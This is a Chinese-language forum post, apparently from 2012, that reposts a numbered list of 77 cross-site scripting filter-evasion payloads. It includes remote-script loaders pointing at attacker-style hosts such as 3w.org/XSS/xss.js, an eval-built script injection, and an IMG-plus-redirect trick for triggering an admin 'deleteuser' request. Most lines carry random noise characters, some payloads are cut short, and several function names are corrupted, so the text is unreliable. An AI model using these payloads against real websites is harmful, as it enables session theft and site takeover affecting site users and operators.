貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。4 n/ ?: _1 a9 h, ~! F
6 f$ ?" j+ q9 @ (1)普通的XSS JavaScript注入
9 c+ t" ~* G6 @ ]" h% Z, F <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" T7 @7 x* e( m( l9 z, L8 V
- d8 B. ]+ p2 E0 E3 Q4 r (2)IMG标签XSS使用JavaScript命令3 d- K: g" U2 f: e) r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 O9 @9 J7 c# |4 t+ e# z$ e* I2 a- O" Z. _4 M/ z9 ?
(3)IMG标签无分号无引号/ }1 s( V: ]7 S `; B, U. r( c2 S
<IMG SRC=javascript:alert(‘XSS’)>* i" ^( ~. Y5 t
. L g* U- A5 x, r- N }
(4)IMG标签大小写不敏感
; m- l+ P g- J1 B8 T <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 r; d0 Y2 m! F* h- L
) F* K" n1 }: a (5)HTML编码(必须有分号)* r* A) ~9 A: `9 X! @
<IMG SRC=javascript:alert(“XSS”)>: D/ r8 m1 X0 O/ t. |
3 l: y6 x8 Y! {7 Y
(6)修正缺陷IMG标签' x4 h( ^1 a3 H" z0 O
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, v6 |# G& Q! R- ?* @6 d% M
$ }; c+ x) e( g+ }0 U (7)formCharCode标签(计算器)" h! d; q9 y0 @5 F' c
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( O1 T( o' X' V h
$ [$ Y# N! k7 z0 K6 [& n- H (8)UTF-8的Unicode编码(计算器)+ o5 ~- y3 c' d- w* K n* Y
<IMG SRC=jav..省略..S')>
) m& V1 ?. S2 l
, s' b2 D1 {" [) J4 z8 l (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 h" e$ s) B- u. l& M" R <IMG SRC=jav..省略..S')># \2 }0 Z% s8 {' |# a7 C6 Q
# D* J5 S! F8 e. e3 v (10)十六进制编码也是没有分号(计算器)
* s: ^' S5 X1 N' K$ r& e <IMG SRC=java..省略..XSS')>
8 c2 e4 ^* ~4 L2 y! e8 a% R
7 G. {) x/ s& u7 x9 i6 c (11)嵌入式标签,将Javascript分开
2 P$ v; ]9 M& N; o5 J2 ? <IMG SRC=”jav ascript:alert(‘XSS’);”>$ S+ C; R7 u, `! A
6 p" x4 H# U9 p& n; L (12)嵌入式编码标签,将Javascript分开 E( X, T* v% X+ B9 k# N+ y6 W
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 g: E' B2 ]6 d6 |! }" Y- I) B0 K' U0 f
(13)嵌入式换行符. T! `0 l% j" x" [- v- T8 u& u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. ]+ Z2 [5 Q1 S0 q) L# C( h7 i# x+ ^- w9 U
(14)嵌入式回车& _2 Z6 T2 C( L8 J0 c' [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 u; z; A3 q3 u q) O
. F7 d: m+ ]( B( R" B (15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 Y9 a( O9 U, N2 z <IMG SRC=”javascript:alert(‘XSS‘)”>* ~6 v" D8 E: b# G
4 I' ]8 c) B( }$ M+ { (16)解决限制字符(要求同页面)
+ |6 Q, j# b1 R! A# ]" x <script>z=’document.’</script>- Q- D* d9 |; K! @" [& z
<script>z=z+’write(“‘</script>* P- x3 M o1 c1 d' V
<script>z=z+’<script’</script>
W2 q- Q" o& w4 P/ s/ I0 q <script>z=z+’ src=ht’</script>
$ E, x9 c8 Y1 e, D' W <script>z=z+’tp://ww’</script>2 ]* d W+ M9 J, _( _& r# o
<script>z=z+’w.shell’</script>
2 e7 S, @( h) K <script>z=z+’.net/1.’</script>0 |- P3 z1 N7 y) a4 d0 O% S
<script>z=z+’js></sc’</script>4 i: p+ F7 J' \) h' @: q
<script>z=z+’ript>”)’</script>
* W. t2 r+ C' i: a <script>eval_r(z)</script>3 x7 K4 b. h/ S) E3 B; r. |
. `! T' L) `1 r3 y0 v (17)空字符. ?, |/ W d/ q! f- g0 |0 r
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 t' m5 `$ A+ [# f6 I
% @/ X$ _/ Q' m! K* K- n (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 O9 Y B) V3 _* w7 u perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) G) h( V' m0 P
' |, d9 A6 _; r4 v, N! I5 k) E$ f( m
(19)Spaces和meta前的IMG标签9 o+ C# W0 e) M/ f
<IMG SRC=” � javascript:alert(‘XSS’);”>
( s! ]: n, u$ Y7 p1 b9 n- I2 O
- d) e; w# S) G4 u (20)Non-alpha-non-digit XSS
& _: R1 M2 P4 A9 c <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" n0 t3 d3 Q9 F* e* w3 H7 ^
. N' k) b6 w: x (21)Non-alpha-non-digit XSS to 22 m, V6 k3 W, F1 w) g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" @$ }- c2 ?2 ~; M* m# n
3 ^1 ~2 C2 Z6 S2 i O' j (22)Non-alpha-non-digit XSS to 3. v2 g; n# T6 W2 ^
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>6 U" a) v* f& P! u* @$ @9 N$ k
& B& }2 V7 V* ~9 D, s (23)双开括号
8 [9 V4 `, n- ^4 A7 {, t+ J6 @ <<SCRIPT>alert(“XSS”);//<</SCRIPT>" t" `8 W D _$ z" e6 g# s
, D4 t; D. p" f
(24)无结束脚本标记(仅火狐等浏览器)- J* q1 G# {, C9 y0 v
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 x) Y5 R: a$ i8 v1 w
# z3 }0 `* O0 q (25)无结束脚本标记2
% [+ [" a; ~+ t6 U4 { <SCRIPT SRC=//3w.org/XSS/xss.js>4 g7 [6 s3 r2 H, C' u
( I; n2 m( Y) s0 U
(26)半开的HTML/JavaScript XSS
2 |9 e6 {- W: m) h3 p6 } <IMG SRC=”javascript:alert(‘XSS’)”9 l; Q F& t. l$ ?( s# u
! B4 b% R- e6 W7 B, B; v9 J* Q/ ^& o
(27)双开角括号4 o4 f( r G7 i, i
<iframe src=http://3w.org/XSS.html <) p2 ]$ Z( x8 I* r' d
2 m9 X7 H( V% U, |
(28)无单引号 双引号 分号. S8 q' u. W, }
<SCRIPT>a=/XSS/# v( s3 c( X, t3 C$ x
alert(a.source)</SCRIPT>2 y9 \- ]. V' Z( d0 }) L7 z
1 t" `6 @) W" k3 x/ ~( e (29)换码过滤的JavaScript
& h- P1 D1 ^5 o- [2 _. R \”;alert(‘XSS’);//8 }! U3 V$ M# D, Z
( d' i7 J( |+ O9 B (30)结束Title标签/ Q7 {5 S, D2 f/ {4 o$ d9 \
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 b2 ?, P+ u( @0 i6 [. d3 B2 o- n
* B7 i; @% b! _6 b6 L& F8 w5 P (31)Input Image
2 R! \. R8 W6 c$ D8 Z7 F$ Z" k <INPUT SRC=”javascript:alert(‘XSS’);”>7 z( c* L* w, R2 ~* @4 f9 ]* N6 n
2 G: F1 C/ y R8 T: l% @+ @, n
(32)BODY Image
; p, ^! i3 ~. @* g <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ r E( ]1 K1 y6 E, p5 o# V0 E3 H; H2 D3 d
(33)BODY标签5 F. M; F9 V m [
<BODY(‘XSS’)>
6 P0 R% V5 Y( Q+ O+ x8 E! s* q g% U8 {% l
(34)IMG Dynsrc
8 A( r$ K) _# T' N- `6 Z <IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 w+ r/ v7 \6 c( k d" I
3 B. E. y3 e4 Z6 `8 E9 W6 l" y (35)IMG Lowsrc x" C! |" a- a1 z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ z8 S: l H9 I, |+ ]/ A
, p7 [# ]& w# W! x( Z# a0 m
(36)BGSOUND' U8 V% q3 A6 Z0 j: g+ q5 F
<BGSOUND SRC=”javascript:alert(‘XSS’);”># ]% y5 |. J5 ^- ~( g; I
9 J3 c" x! ~) b0 B! y' Q (37)STYLE sheet
{" W. a5 {: g! L <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% p4 [ T& }7 U# n
* ?6 @* T3 {5 p* J& Q
(38)远程样式表. ]; ?& T, F6 ?
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( D+ a' S0 {. F$ {
* @3 G8 H( q- [ \! ]! @0 c
(39)List-style-image(列表式)4 U8 S& o: z E0 g, q8 t0 k
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! k7 V3 G& a6 \$ I) z4 x* J
/ J1 r" d: f1 {& b m2 f3 t+ } (40)IMG VBscript
; }6 W' ?' D* h' E" S3 Q: w <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS" r9 v5 U# `5 A: Q) y# C
9 E$ z _5 U j, X" P0 o { (41)META链接url
; K, c( | k' ~, W <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 n- W" \% K) J2 s
) n* N H p0 Y' n' ~
(42)Iframe
9 G1 \0 A! b! B4 d <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
) y; q7 a7 E8 M0 ?& ^7 r y
8 G& F% }" J& C/ O (43)Frame
' Q, H% f/ X/ U: s" g0 z7 b9 @ <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 L2 o2 H. Q4 N( y: f
4 G3 ^6 I5 c+ z f8 n" \ (44)Table2 S% @6 [; { R: ?
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% R) u. U$ L; P1 l: S
- v" b- f, d: s- q (45)TD3 L! z- n* q& R2 q/ A
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 e3 Y% n/ a% T( i' e6 i4 L! |
! ^. m6 ^( Q; u, u& j
(46)DIV background-image
4 t; y0 H6 [) ^9 }* Y% j <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 C! y2 @6 @' q* b% E. ]0 }' t3 ~7 c: U8 L9 t8 w( H
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 Y1 P8 L9 {9 S* t( J1 ^; h+ [ <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
7 ~' j/ P0 D: b" A3 q! ]7 @
" v6 T( @ b8 t L& L' I8 E (48)DIV expression
" _# }* N: `. h! D; m <DIV STYLE=”width: expression_r(alert(‘XSS’));”>9 w- q1 V8 [& Z7 E
$ n) [2 h; Q' M ~ (49)STYLE属性分拆表达
: p' o6 t f+ I; L6 t& }* }8 Q& E/ J <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( Y s* V8 C9 X$ Y, R) X' `. [. l7 j. ^, @2 B" ^0 a7 A
(50)匿名STYLE(组成:开角号和一个字母开头)
; M) B0 E) l' ?, p+ | <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 Y8 e' z8 d+ ~) K. i( n. H/ p
A" u3 A/ S5 i' G6 F! K/ a8 b
(51)STYLE background-image
. G( T/ ]& B- a8 R- F <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
0 G3 B. y1 O- r# ~+ D% q
! j2 j# a U4 K" { (52)IMG STYLE方式
" |4 K" e% M/ H& h0 ?1 q7 Q3 T exppression(alert(“XSS”))’>: f2 M- f3 [5 P7 W. N( a
; y8 y$ Q& V" j% S) v, U8 c0 M0 M
(53)STYLE background
2 z% f- N" V2 q5 H, q <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 ~, S3 |( s4 I5 h7 v
6 J( u: H( a3 J9 ~0 Y( O (54)BASE: [7 W5 n! r# V* }/ z) P. U' a
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 J( ^6 O5 Y0 ?- ^: A' O" o
3 ]# o7 y, c. x( Z& f7 N) ?( d5 M (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- w* _* ~ C$ G
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* O- ^' u6 }8 @. R
# V2 Z9 z5 p: h* D; C M (56)在flash中使用ActionScrpt可以混进你XSS的代码% k- p0 h( S3 T. a' g$ W
a=”get”;% W6 W9 v1 N3 o/ z
b=”URL(\”";
" Z/ C9 k7 I& B% G c=”javascript:”;
; v4 `+ F* j* l1 Q" q d=”alert(‘XSS’);\”)”;
7 T( s. z% o0 H5 j2 Z9 A eval_r(a+b+c+d);0 u, @: z: @. F/ M9 V
' Y: p# B! {9 z1 T# \- j (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 m9 p" @0 u+ C. t" b! x <HTML xmlns:xss>
2 p& n: p6 q* y+ M' w! h5 r: v <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ [# W2 L! y4 i* F0 Z- [* G
<xss:xss>XSS</xss:xss>3 F' `2 l6 Z6 e1 c4 [# _
</HTML>
! Z$ |% m" c" R2 L+ ]
4 a% G. J1 o9 M- b) u% `/ g, k (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
5 K' o9 q3 { _* Z2 S, i2 o5 J <SCRIPT SRC=””></SCRIPT>( E; a# G! w$ Y P$ W5 O+ v
1 Q6 b6 W$ {" a( S6 P( E
(59)IMG嵌入式命令,可执行任意命令. G+ g9 |$ j' k. @ h8 H
<IMG SRC=”http://www.XXX.com/a.php?a=b”>' K% D8 P# C1 ?0 T' [" A' @3 ?* |
- a2 X; I7 X7 c# @1 x( \ (60)IMG嵌入式命令(a.jpg在同服务器). b/ a5 z) H0 V* A' A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 C# g' C) e% T% _. Q0 ^) {& T& ^- c9 C) g Y
(61)绕符号过滤5 k& A$ h9 d' T8 d( h5 D& n
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>, d, n: T( z( {* p( X1 ~
6 [. n2 c' J- ?1 w$ r) {1 ^1 Q# O
(62)
6 ~( O! G( X0 @- p <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ H+ b! \) n" v; ~- w9 t
& Z: a5 U: F, ]) r (63)# t4 k3 \4 V2 O w% k* I# T) `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 o+ P4 a# @$ C
. T" X1 M |0 v4 }1 T
(64)
% g8 g* A$ Z# ^ <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 {6 M8 ^, K: {4 \% O
) B& R5 H- g6 L! t) Y
(65)$ H( V7 g/ e) D8 F/ D
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! t: ^- \! V4 m4 t
/ P, p6 c4 W) S) w (66)$ D! A5 W' `, q- F3 {7 Q8 m
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& x0 T/ u3 Y! h8 P' h8 [3 o- ]4 i ^# t/ W1 g
(67)
0 K. \7 d6 ]0 j* y. b; Y <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
' s0 H. K' b0 Z8 x- z: j% ?* D A
(68)URL绕行
8 [ l3 ?" V6 l g <A HREF=”http://127.0.0.1/”>XSS</A>
8 ~# i$ h% S8 Y8 U6 k. F e! r. R; j0 v' m
(69)URL编码( G7 Z, I. P* m& V
<A HREF=”http://3w.org”>XSS</A>
% g8 n' G' W6 J; g |& R, S
. Z2 e9 B2 q( I- E6 F6 U: j/ l (70)IP十进制
3 h" Z/ r$ D) _" s <A HREF=”http://3232235521″>XSS</A>6 j! G3 Q/ y# D/ s
% F# Q! d( k# }9 R- o9 j* u (71)IP十六进制1 Q: o- Q1 Q) ^; E( ?" e
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
( ^1 w7 Q( m' M( g2 N8 G3 f
" M( O2 s. n* k% K+ D (72)IP八进制' B9 z9 N. s3 @$ { D; X' j6 x
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
8 T2 n9 d( t+ @0 e( @1 h2 V+ U6 Z( `9 }) t$ ^" J! H9 x; v
(73)混合编码
: W) }+ G+ R6 T3 E6 N4 \5 f) r$ W <A HREF=”h: h h0 x6 d7 J f6 x
tt p://6 6.000146.0×7.147/”">XSS</A>$ @" \9 v( Z- t
* i4 ~' }' W! e/ n, S (74)节省[http:]
4 T, B [# O1 n6 d V1 N; R: U <A HREF=”//www.google.com/”>XSS</A>
/ P0 n/ ^, i" R9 a- |) ~
1 o, v8 B* Y9 A4 l+ h. u/ \ (75)节省[www]
7 v6 L4 t4 {0 o <A HREF=”http://google.com/”>XSS</A>- o9 Y2 a/ {5 `, M; n& u, f. |. Z
( C, I( R# _0 ~( A4 F
(76)绝对点绝对DNS
/ l( G; o- T% C8 f0 k5 g <A HREF=”http://www.google.com./”>XSS</A>0 ` g; Z( q+ R( @% Q# }- k7 K
% _, _+ U& G0 y7 a
(77)javascript链接8 D9 P; J% Z, ]& b' ]
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对